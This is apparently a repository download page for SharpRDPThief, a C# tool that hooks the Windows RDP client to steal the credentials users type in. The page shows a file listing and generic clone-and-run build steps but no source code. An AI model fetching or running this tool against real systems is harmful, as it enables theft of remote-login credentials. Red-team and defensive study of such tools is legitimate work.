SharpRDPThief
A C# implementation of RDPThief to steal credentials from RDP.
File Explorer
Download Latest Version (.zip)- .suo
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- EasyHook.dll
- EasyHook.xml
- EasyHook.dll
- EasyHook.xml
- install.ps1
- .signature.p7s
- EasyHook.2.7.6035.nupkg
- EasyHook.dll
- EasyHook.xml
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- RDPHook.dll
- RDPHook.pdb
- .NETFramework,Version=v4.5.2.AssemblyAttributes.cs
- DesignTimeResolveAssemblyReferencesInput.cache
- FileMonitorHook.csproj.CopyComplete
- FileMonitorHook.csproj.CoreCompileInputs.cache
- FileMonitorHook.csproj.FileListAbsolute.txt
- FileMonitorHook.csprojAssemblyReference.cache
- RDPHook.csproj.CopyComplete
- RDPHook.csproj.CoreCompileInputs.cache
- RDPHook.csproj.FileListAbsolute.txt
- RDPHook.csprojAssemblyReference.cache
- RDPHook.dll
- RDPHook.pdb
- AssemblyInfo.cs
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- InjectionEntryPoint.cs
- packages.config
- RDPHook.csproj
- ServerInterface.cs
- EasyHook.dll
- EasyHook.xml
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- RDPHook.dll
- RDPHook.pdb
- SharpRDPThief.exe
- SharpRDPThief.exe.config
- SharpRDPThief.pdb
- 5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed
- 9A3725F2E102BFEDDC8FBF0825B92A6FA4A66C57.costura.rdphook.dll.compressed
- AF677B7818F46569911EEA3241821ED0A53D857E.costura.easyhook.dll.compressed
- EB8899BC7546D74E70CDCFCE59976B8C87143BA6.costura.rdphook.pdb.compressed
- .NETFramework,Version=v4.5.2.AssemblyAttributes.cs
- DesignTimeResolveAssemblyReferencesInput.cache
- FileMonitor.csproj.CopyComplete
- FileMonitor.csproj.CoreCompileInputs.cache
- FileMonitor.csproj.FileListAbsolute.txt
- FileMonitor.csprojAssemblyReference.cache
- SharpRDPThief.csproj.CopyComplete
- SharpRDPThief.csproj.CoreCompileInputs.cache
- SharpRDPThief.csproj.FileListAbsolute.txt
- SharpRDPThief.csprojAssemblyReference.cache
- SharpRDPThief.exe
- SharpRDPThief.pdb
- AssemblyInfo.cs
- App.config
- EasyHook32.dll
- EasyHook32Svc.exe
- EasyHook64.dll
- EasyHook64Svc.exe
- EasyLoad32.dll
- EasyLoad64.dll
- FodyWeavers.xml
- FodyWeavers.xsd
- packages.config
- Program.cs
- SharpRDPThief.csproj
- README.md
- SharpRDPThief.sln
# Installation Guide
1. Get the code
git clone https://github.com/passthehashbrowns/SharpRDPThief
Downloads the entire project code from GitHub to your computer.
cd SharpRDPThief
Moves into the project folder you just downloaded.
2. .NET
Medium RecommendedPrerequisites
cd RDPHook
This project's files live in a subfolder, so move into it first.
dotnet restore
Downloads the packages the project depends on.
dotnet run
Builds the project and runs it immediately.
After dotnet run, check the message or address shown in the terminal.
// repository documentation
Was this content helpful?
(0 ratings)
